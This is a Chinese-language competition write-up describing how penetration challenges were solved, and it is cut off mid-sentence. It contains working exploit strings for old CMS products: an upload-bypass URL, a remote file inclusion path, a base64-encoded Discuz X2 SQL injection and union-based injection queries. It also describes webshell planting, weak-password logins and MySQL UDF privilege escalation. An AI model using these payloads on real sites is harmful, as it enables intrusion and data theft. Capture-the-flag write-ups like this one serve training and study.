渗透比赛过程.doc

某大学信息安全大赛渗透题目过程 第五关dzx1.5 getshell 第六关织梦远程变量覆盖拿到webshel使用的是弱口令第七关听说能通过数据库查询出管理员密码，好神奇啊，找到密码，再在webshell里找key其实就是ASPCMS2.4那个正式版，数据库是data/data.asp下载回来，查询密码然后直接/admin/可以登录，添加模版为xx.asp;写入一句话，得到webshell，找到KEY第八关就是乔客的上传漏洞很好利用，l可以这样common/upload.asp?channel=usefiletype=asafilename=fileinput=u_faceformname=thumbname=thumbinput=，然后上传xx.asa就可以拿到shell了第九关就是phpwind7.5的远程文件包含漏洞apps/groups/index.php?route=groupsbasePath=/php.txt?写入一句话，在菜刀里面去连接提示是IDEACMS，然后旁边的是admin%5Fd57d随后在url后面加上admin%5Fd57d就进入后台了,然后测试admin testtest在后台的管理角落找到KEYWeb11系列 存在fck，可以新建1.asp，上传图片就可以得到shell 然后下面一道题是通过web13进入后台后，找到mysql的连接密码，连接上mysql，通过udf进行提权，提权后，直接在cmdshell里操作，dos命令下进入桌面 ，然后复制桌面上的key到web目录，拖回本地，ok Web2系列， web2的第一题就是让我们找到后台路径，那么我们开始吧 打开这个网站/bbs/forum.php 如下图： 这个是discuz x2搭建的站，找后台还不简单啊，直接后面加admin.php直接就来到了后台登陆页面，心里一喜，如此简单，但是提交key的时候才发现并不是这么简单，难道是要进入后台才有线索吗？我继续尝试着，点开几个页面也没发现奇怪的地方，网上找了下相关的漏洞，Discuz! X2在处理请求数据时存在SQL注入漏洞，远程攻击者可利用此漏洞非授权操作数据库，找到了相关的exp为 /forum.php?mod=attachmentfindpost=ssaid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2VsZWN0IDEsVEFCTEVfTkFNRSBmcm9tIElORk9STUFUSU9OX1NDSEVNQS5UQUJMRVMgd2hlcmUgVEFCTEVfU0NIRU1BPWRhdGFiYXNlKCkgYW5kICBUQUJMRV9OQU1FIGxpa2UgJyVfbWVtYmVyfHh8eHx4fHg%3D 连续好几天，尝试了各种爆出的漏洞，还是不行，于是我再次打开页面，仔细看每个可能提供线索的信息，于是我找到了如下的这个页面。 这里是admin发布的一条信息，please look the path carefully!!，，要我注意路径，我静下来好好想想，难道是有隐藏的东西，真实的路径未必是眼前这个路径，我用工具扫啊扫，在目录下居然扫到了一个/blog目录，顿时让我泪流满面，好狡猾啊···，于是我打开/blog/，出现如下图所示的页面： 看见了吧，终于揭开了题目的庐山真面目，可能就是找这个站的后台路径吧，我还是下意识的在后面加上admin，来到后台登陆页面，如下图 做的很简单，试试弱口令admin admin，进入后台···，让我吃惊的是这个后台是这样的， 这什么意思···，出题的人也太猥琐了吧，还带这样的，通过多方打听，终于社工到上面的信息，回到/blog/admin这个登陆页面，将社工到的两个信息分别输入进去，然后就得到了如下图： 查看网页的源代码得到这样的提示：It is just the first step!!--the second step is here:/blog/admin/paper.php?ArticleID=1-- 至此，我对出题人那浪漫的想象力完全折服，好吧，进入第二步，打开提示的页面， 看标题，这是一道sql的注入题，随便测试了下，让AriticleID=-1，返回报错， 、 应该可以确定是注入了，专门出一道注入的题，不可能用工具能跑出来吧，于是我根本没用工具去跑，直接用我们勤劳的双手啊，先去查询有多少个字段， /blog/admin/paper.php?ArticleID=1/**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,6,7,8 爆出来的是8个字段，可以看到Content:6这里，所以我们替换6的查询语句， /blog/a